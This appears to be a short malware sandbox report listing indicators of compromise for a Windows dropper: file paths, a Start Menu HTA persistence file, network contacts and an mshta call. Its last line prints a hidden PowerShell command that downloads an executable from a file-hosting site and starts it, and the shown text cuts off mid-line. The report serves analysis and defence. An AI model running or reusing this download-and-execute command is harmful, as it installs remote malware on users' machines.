Technical Information
- https://www9.zippyshare.com/d/mfssnjsj/971070/server.exe as %temp%\exploit.exe
- %APPDATA%\microsoft\windows\start menu\exploit.hta
- %TEMP%\exploit.exe
- 'ww##.#ippyshare.com':443
- 'ww##.#ippyshare.com':443
- DNS ASK ww##.#ippyshare.com
- '%WINDIR%\syswow64\mshta.exe' "%APPDATA%\Microsoft\Windows\Start Menu\Exploit.hta"
- '<SYSTEM32>\cmd.exe' /c PowerShell.exe -windowstyle hidden (New-Object System.Net.WebClient).DownloadFile('https://www9.zippyshare.com/d/MFSsnJsJ/971070/Server.exe','%temp%\exploit.exe');Start-Process '%temp%\explo...